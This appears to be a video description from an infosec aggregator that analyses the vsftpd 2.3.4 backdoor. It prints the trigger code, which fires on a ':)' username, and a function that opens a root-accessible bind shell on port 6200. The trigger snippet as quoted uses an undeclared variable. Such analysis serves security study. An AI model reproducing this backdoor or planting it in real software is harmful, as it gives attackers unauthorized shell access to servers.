Description: So, the backdoor affects specifically 2.3.4 version of the popular FTP daemon and can be found in str.c file which contains code for handling the string manipulation routines.
int
str_contains_line(const struct mystr* p_str, const struct mystr* p_line_str)
{
static struct mystr s_curr_line_str;
unsigned int pos = 0;
while (str_getline(p_str, &s_curr_line_str, &pos))
{
if (str_equal(&s_curr_line_str, p_line_str))
{
return 1;
}
else if((p_str->p_buf[i]==0x3a)
&& (p_str->p_buf[i+1]==0x29))
{
vsf_sysutil_extra();
}
}
return 0;
}
While parsing the received string values, if the string begins with “\x3A\x29″ which in ASCII translates to ‘:)’ (a smiley face), it will invoke vsf_sysutil_extra().
This backdoor function was placed in sysdeputil.c file and looks like this:
### sysdeputil.c ###
int
vsf_sysutil_extra(void)
{
int fd, rfd;
struct sockaddr_in sa;
if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
exit(1);
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(6200);
sa.sin_addr.s_addr = INADDR_ANY;
if((bind(fd,(struct sockaddr *)&sa,
sizeof(struct sockaddr))) < 0) exit(1);
if((listen(fd, 100)) == -1) exit(1);
for(;;)
{
rfd = accept(fd, 0, 0);
close(0); close(1); close(2);
dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);
execl("/bin/sh","sh",(char *)0);
}
}
It simply opens a new TCP socket listening on port 6200 that will spawn a shell when connected to this port.
So, by using the ‘:)’ as username the attackers were able to trigger this backdoor in vsftpd 2.3.4.
Tags: Metasploitable 2 , vsftpd , backdoor , Hacking , Hacker , Japtron , José Antonio Pérez ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.